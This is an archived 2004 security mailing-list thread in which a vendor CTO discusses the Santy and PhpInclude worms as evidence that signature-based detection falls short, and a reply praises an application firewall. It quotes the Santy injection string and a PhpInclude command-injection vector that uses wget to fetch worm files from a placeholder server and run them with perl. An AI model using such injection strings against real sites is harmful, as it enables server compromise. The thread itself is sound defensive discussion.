WebApp Sec mailing list archives
RE: The Santy worm and Application Security
From: "xxradar" <xxradar () radarhack com>
Date: Tue, 28 Dec 2004 17:48:09 +0100
Hi all, I was experimenting with an Application layer firewall, called Intelliwall from http://www.bee-ware.net. The fw successfully detected earlier PHP scanning activity and also successfully detected the santy worm whithout pattern updates or whitelist configuration. The detection mechanism is based on neural network technology and works astonishing well. Gr, -----Original Message----- From: Ofer Shezaf [mailto:Ofer.Shezaf () breach com] Sent: Monday, December 27, 2004 6:41 PM To: webappsec () securityfocus com Subject: The Santy worm and Application Security Hi All, As an application security professional I've always been frustrated, as I'm sure many of you have been, with the lack of understanding of application security among IT professionals. Many think that solving application security issues only requires an IPS/IDS, VA and patching. Only a few out there really understand the depth of the problem as presented in the OWASP top 10. The Santy worm is a turning point in this respect. As Santy and "PhpInclude", its successor, are application layer attacks ("PHP injection" and "command injection" respectively) they stretch signature based technology to its limits and require signatures that are easy to evade and are prone to generate false positives. Just think how many different ways the Santy attack vector used as a snort signature <<<'&highlight=%2527%252Esystem('>>> can be modified to evade an IDS (manually or automatically). "PhpInclude" is even more interesting as it does not address a specific vulnerability but tries to exploit a known flawed technique used to write PHP code. It tries to change arbitrary parameters of a PHP script to a command injection string, expecting that in some cases these parameters will be used in a PHP include statement. It is probably the first worm to exploit a OWASP top 10 security problem and not a specific voluntarily. The "phpInclude" attack vector is varying but has the general form <<<cmd=cd /tmp;wget *server*/spybot.txt;wget *server*/worm1.txt; perl worm1.txt>>>. A signature based system may look for the signatures such as "perl", "cmd" or "wget" but they are way too short and simplistic to evade false positives. "Santy" and "phpInclude" emphasize the need for real application security measurements such as code review, application layer scanning and real time application layer security. An interesting solution for real time protection is application layer signatures. Such signatures predict better application layer attacks. To do so they have to be contextual (i.e. confined to field values), normalized and correlated to other attack indicators such as abnormal behavior or multiple signature match during the session's requests and responses. While I'm not writing this all as a marketing pitch, some of these ideas are implemented in my company's products ;-) I'd be happy to hear what the other pros here have to say about this. ~ Ofer Ofer Shezaf, CTO Breach Security, Inc. Deployable Application Security http://www.breach.com Tel: +972.9.956.0036 ext.212 Cell: +972.54.443.1119 ofers () breach com -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.0.296 / Virus Database: 265.6.5 - Release Date: 12/26/2004 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.296 / Virus Database: 265.6.5 - Release Date: 12/26/2004
Current thread:
- The Santy worm and Application Security Ofer Shezaf (Dec 28)
- RE: The Santy worm and Application Security xxradar (Dec 30)